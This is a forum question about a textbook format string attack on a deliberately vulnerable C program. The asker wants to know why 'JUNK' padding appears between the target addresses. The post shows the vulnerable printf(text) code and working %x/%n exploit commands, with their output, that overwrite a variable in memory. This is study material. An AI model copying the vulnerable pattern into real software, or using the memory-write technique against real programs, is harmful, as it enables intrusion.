# Writing to Arbitrary Memory Addresses

Tags: security, memory, c

I'm reading "Art of Exploitation 2nd Ed." and I have a question regarding a section on format string attacks.

#### Target program

Below code (`fmt_vuln.c`) is a target program.

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
char text[1024];
static int test_val = -72;
if(argc < 2) {
printf("Usage: %s <text to print>\n", argv[0]);
exit(0);
}
strcpy(text, argv[1]);
printf("The right way to print user-controlled input:\n");
printf("%s", text);
printf("\nThe wrong way to print user-controlled input:\n");
printf(text);
printf("\n");
// Debug output
printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val,
test_val);
exit(0);
}
```

In this program, I'm trying to write a value "0xddccbbaa" to the address of `test_val`.

#### Attack method according to book

The book says that:

```
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x08049794 = 52 0x00000034
```

Now launch gdb:

```
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xaa - 52 + 8"
$1 = 126

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $
```

Launch `gdb` a 2nd time:

```
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
0 4b4e554a
[*] test_val @ 0x08049794 = 48042 0x0000bbaa
reader@hacking:~/booksrc $
```

I don't understand why I need "JUNK"?

**NOTE:** [you can read this chapter this link](http://rogunix.com/docs/Reversing&Exploiting/Hacking%20-%20The%20Art%20of%20Exploitation_2nd%20Ed.pdf), page : 173

Comment: This question appears to be off-topic because it requires low-level programming competence. It would be on-topic on [so] but more likely to receive good answers on [security.se].

Comment: What do you mean by “why I need "JUNK"”? As opposed to what?